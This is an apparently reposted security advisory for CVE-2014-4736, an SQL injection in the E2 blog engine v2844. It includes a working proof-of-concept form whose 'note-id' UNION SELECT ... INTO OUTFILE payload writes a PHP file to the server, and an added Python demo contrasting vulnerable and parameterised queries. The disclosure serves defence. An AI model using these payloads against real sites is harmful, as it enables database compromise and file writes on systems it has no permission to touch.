Source: 0day.today (High-Tech Bridge), 1337DAY-ID-22468
History: Jul 24, 2014 - 12:00 a.m.

E2 2844 SQL Injection Vulnerability

2014-07-24 00:00:00
High-Tech Bridge
0day.today
26

EPSS: 0.001 (Low), Percentile: 34.9%

E2 version 2844 suffers from a remote SQL injection vulnerability.

Product: E2
Vendor: Ilya Birman
Vulnerable Version(s): v2844 and probably prior
Tested Version: v2844
Advisory Publication:  July 2, 2014  [without technical details]
Vendor Notification: July 2, 2014 
Vendor Patch: July 3, 2014 
Public Disclosure: July 23, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-4736
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in E2, which can be exploited to perform SQL injection attacks and gain control over the vulnerable application.


1) SQL Injection in E2: CVE-2014-4736

The vulnerability exists due to insufficient sanitization of input data passed via the "note-id" HTTP POST parameter to the "/@actions/comment-process" URI. A remote attacker can send a specially crafted HTTP POST request and inject and execute arbitrary SQL commands in the application's database. Successful exploitation of the vulnerability may allow an attacker to add, modify or delete arbitrary records in the database and gain complete access to the web site.

The PoC form below, when submitted, turns the "note-id" value into a UNION SELECT ... INTO OUTFILE query that creates a PHP file "/var/www/file.php" containing a "phpinfo()" call (if the filesystem permissions and MySQL configuration allow it: the database user needs the FILE privilege and the target directory must be writable by the MySQL server and not blocked by secure_file_priv):


<form action="http://[host]/@actions/comment-process" method="post" name="main">
<input type="hidden" name="already-subscribed" value="">
<input type="hidden" name="comment-id" value="new">
<input type="hidden" name="elton-john" value="1">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="from" value="">
<input type="hidden" name="name" value="name">
<input type="hidden" name="subscribe" value="on">
<input type="hidden" name="text" value="1">
<input type="hidden" name="note-id" value="' UNION SELECT '<? phpinfo(); ?>',2,3,4,5,1,7,8,9,10,11,12,13,14,15 INTO OUTFILE '/var/www/file.php' -- 2">
<input type="submit" id="btn">
</form>
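The query pattern the advisory describes, modelled as an added example (this is not E2's own code; the advisory does not publish E2's source). It assumes a hypothetical "notes" table with "id", "alias", "title" and "state" columns, and uses SQLite in place of MySQL, so the INTO OUTFILE step of the PoC is not reproduced (that step needs MySQL's FILE privilege and a directory not restricted by secure_file_priv). The point it shows is the same CWE-89 defect: the request parameter spliced into the SQL text lets a UNION payload read rows the lookup was never meant to return, while a bound parameter treats the identical payload as a plain string.

```python
"""
Added example, not E2's code: a note lookup keyed on a user-supplied
"note-id", once with string concatenation (vulnerable, CWE-89) and once
with a bound parameter (fixed). Table and column names are assumptions.
"""
import sqlite3

# Constructed sample data: one published note and one draft that a
# comment-process request should never be able to read.
NOTES = [
    (1, "hello-world", "Hello, world", "published"),
    (2, "draft", "Not yet public", "draft"),
]


def make_db():
    """Build an in-memory SQLite database with the assumed notes table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE notes (id INTEGER, alias TEXT, title TEXT, state TEXT)"
    )
    conn.executemany("INSERT INTO notes VALUES (?, ?, ?, ?)", NOTES)
    return conn


def lookup_note_vulnerable(conn, note_id):
    """Vulnerable: the POST parameter is concatenated into the SQL text."""
    sql = "SELECT id, alias, title FROM notes WHERE alias = '" + note_id + "'"
    return conn.execute(sql).fetchall()


def lookup_note_fixed(conn, note_id):
    """Fixed: the value is bound, so it can only be compared as a string."""
    sql = "SELECT id, alias, title FROM notes WHERE alias = ?"
    return conn.execute(sql, (note_id,)).fetchall()


# UNION payload in the same shape as the PoC's note-id value: close the
# quoted literal, append a SELECT with the same column count as the original
# query (15 in the PoC, 3 here), then comment out the trailing quote.
PAYLOAD = "' UNION SELECT id, title, state FROM notes -- "


def demo():
    """Run both lookups with a normal value and with the injection payload."""
    conn = make_db()
    return {
        "normal_vuln": lookup_note_vulnerable(conn, "hello-world"),
        "normal_fixed": lookup_note_fixed(conn, "hello-world"),
        # The vulnerable path returns every note, draft included.
        "payload_vuln": lookup_note_vulnerable(conn, PAYLOAD),
        # The fixed path looks for an alias literally equal to the payload.
        "payload_fixed": lookup_note_fixed(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

Against MySQL the same concatenation is what lets the PoC append INTO OUTFILE; the parameterised form closes that path regardless of what privileges the database user holds, which is why the vendor fix rather than tighter file permissions is the actual remediation.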


-----------------------------------------------------------------------------------------------

Solution:

Update to E2 version v2845

More Information:
http://blogengine.ru/download/

#  0day.today [2018-04-09]  #
